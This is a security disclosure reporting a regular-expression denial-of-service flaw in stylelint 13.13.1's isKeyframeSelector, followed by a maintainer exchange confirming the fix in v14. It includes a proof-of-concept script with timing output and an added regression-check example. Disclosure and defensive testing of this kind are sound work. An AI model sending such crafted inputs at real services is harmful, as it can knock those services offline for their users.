Inefficient Regular Expression Complexity in stylelint/stylelint
Reported on Oct 16th 2021
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in stylelint.
It allows causing a denial of service when calling function isKeyframeSelector.
Proof of Concept
// PoC.js
// Times isKeyframeSelector on inputs of growing length.
var isKeyframeSelector = require("stylelint/lib/utils/isKeyframeSelector");

for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // i * 10000 digits followed by one character that cannot match
    var attack_str = '1'.repeat(i * 10000) + "a";
    isKeyframeSelector(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
Check The Output
"attack_str.length: 10001: 290 ms"
"attack_str.length: 20001: 1072 ms"
"attack_str.length: 30001: 2047 ms"
"attack_str.length: 40001: 3640 ms"
"attack_str.length: 50001: 5688 ms"
"attack_str.length: 60001: 8237 ms"
@admin, please see the security policy https://github.com/stylelint/stylelint/security/policy
Thanks for the report. Can you confirm if this is still an issue with the v14 branch as we recently updated a number of Regexes in it? If so, we welcome a pull request to the v14 branch.
Hi, @maintainer, I tested the latest version (i.e., v13.13.1) of stylelint released on npm. I just verified that this issue does not exist on the v14 branch.
Thanks for checking the v14 branch. It's great news that the issue does not exist there. We hope to release version 14.0.0 of stylelint this week.
As such, do I mark this issue as invalid (or valid as the issue is in 13.13.1 but fixed)?
Hi @maintainer, you can mark this issue as valid and indicate the specific version (i.e., 13.13.1) of the issue. Thanks a lot!
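In the PoC output above, doubling the input from 10001 to 20001 characters raises the time from 290 ms to 1072 ms, close to the fourfold growth expected from quadratic backtracking. The following added example (not code from the report or from stylelint) is a timing-budget regression check of the kind used to confirm such a fix. The two patterns and all function names are assumptions, since the page does not show the regex inside isKeyframeSelector.

```javascript
// Added example, not stylelint's code. The page does not show the regex
// inside isKeyframeSelector, so both patterns below are assumptions.

// ASSUMED vulnerable shape: in "\d+\.?\d*" the dot is optional, so a run of
// n digits can be split between the two quantifiers in n ways. When the
// trailing "%" is missing, the engine retries every split: O(n^2) steps.
const AMBIGUOUS = /^(?:\d+\.?\d*|\d*\.?\d+)%$/;

// ASSUMED hardened shape: the dot is mandatory in the second branch, so each
// digit belongs to exactly one quantifier and a failed match costs O(n).
// Side effect of the tightening: "5.%" is no longer accepted.
const UNAMBIGUOUS = /^(?:\d+|\d*\.\d+)%$/;

// Same input shape as the PoC on this page: n digits, then a tail that
// can never match.
function adversarialInput(n) {
  return '1'.repeat(n) + 'a';
}

// Run one match attempt and report the result with its wall-clock cost.
function timedTest(re, input) {
  const start = performance.now();
  const matched = re.test(input);
  return { matched, ms: performance.now() - start };
}

// Regression check for CI: the pattern must reject the adversarial input
// and must do so inside the time budget.
function rejectsWithinBudget(re, n, budgetMs) {
  const { matched, ms } = timedTest(re, adversarialInput(n));
  return !matched && ms <= budgetMs;
}

// Print timings for the first two input lengths used in the PoC output.
for (const n of [10000, 20000]) {
  for (const [name, re] of [['ambiguous', AMBIGUOUS], ['unambiguous', UNAMBIGUOUS]]) {
    const { ms } = timedTest(re, adversarialInput(n));
    console.log(`${name} length=${n + 1} ${ms.toFixed(1)} ms`);
  }
}
```

The 100 ms budget used in a check like `rejectsWithinBudget(re, 30000, 100)` is a constructed threshold; pick one that leaves headroom on the slowest CI runner.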